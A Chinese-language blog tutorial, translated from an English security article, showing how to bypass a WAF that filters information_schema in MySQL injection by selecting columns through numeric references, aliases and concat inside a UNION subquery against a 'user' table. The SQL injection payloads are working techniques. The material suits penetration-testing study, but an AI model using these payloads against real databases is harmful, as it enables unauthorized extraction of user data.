前言
最近感覺腦子空空,全在為了刷洞去挖洞,還是回歸技術的本身讓自己舒服些。好了,下面話不多說了,來一起看看詳細的介紹吧
前提
以下情況適用于 MySQL 5版本,或者在 MySQL >= 5 的版本[存在information_schema庫],且已獲取到庫名和表名
① 當只能獲取到表名,獲取不到列名或者只能獲取到無有效內容的列名情況【例如 id】
② 當希望通過information_schema庫中的表去獲取其他表的結構,即表名、列名等,但是這個庫被WAF過濾掉的情況
其實個人感覺這個方法還是對 5 版本以下的實用性比較強一些,因為對我來說,一般遇到waf就放棄了(菜的真實23333)
解決
正常的查詢:
以下是正常查詢 test 庫中的 user 表內容
UNION查詢:
select 1,2,3,4 union select * from user;
數字對應列查詢:
可以使用數字來對應列來進行查詢,如 2 對應了表里面的 name 列
select `2` from (select 1,2,3,4 union select * from user)a;
別名代替查詢:
當反引號 ` 不能使用的時候,可以使用別名來代替,如設置 2 的別名為 b
select b from (select 1,2 as b,3,4 union select * from user)a;
多列合并查詢:
同上:這里反引號不能用的話,一樣可以使用別名代替
select concat(`2`,0x3a,`3`) from (select 1,2,3,4 union select * from user)a limit 1,1;
僅作翻譯以及思路整理
原文鏈接:https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/
總結
以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作具有一定的參考學習價值,謝謝大家對腳本之家的支持。
您可能感興趣的文章:- MySQL 及 SQL 注入與防范方法
- SQL Injection with MySQL 注入分析
- Mysql數據庫使用concat函數執行SQL注入查詢
- mysql5 注入漏洞
- 防止MySQL注入或HTML表單濫用的PHP程序
- MySQL注入繞開過濾的技巧總結
- Mysql注入中的outfile、dumpfile、load_file函數詳解
- MYSQL updatexml()函數報錯注入解析
- node-mysql中防止SQL注入的方法總結
- PHP MYSQL注入攻擊需要預防7個要點
